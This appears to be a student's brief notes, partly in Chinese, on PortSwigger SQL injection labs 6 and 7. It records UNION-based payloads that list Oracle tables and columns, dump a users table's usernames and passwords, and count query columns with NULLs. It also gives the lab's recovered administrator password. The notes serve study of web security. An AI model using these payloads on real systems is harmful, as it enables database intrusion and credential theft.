PortSwigger Labs SQLInjection LAB6-7
lab6 列出 Oracle 数据库内容
-1'+union+select+'a','b'+from+dual--+
-1'+union+select+'a',table_name+from+all_tables-- 所有数据库中的表名
-1'+union+select+'a',column_name+from+all_tab_columns where table_name='USERS_JPPXWI'--
-1'+union+select+USERNAME_SSVUSE,PASSWORD_JAFSGD+from USERS_JPPXWI--
administrator
p7dxd4fk073emv832jdw
lab7 SQL 注入 UNION 攻击,确定查询返回的列数
1'union select NULL,NULL,NULL--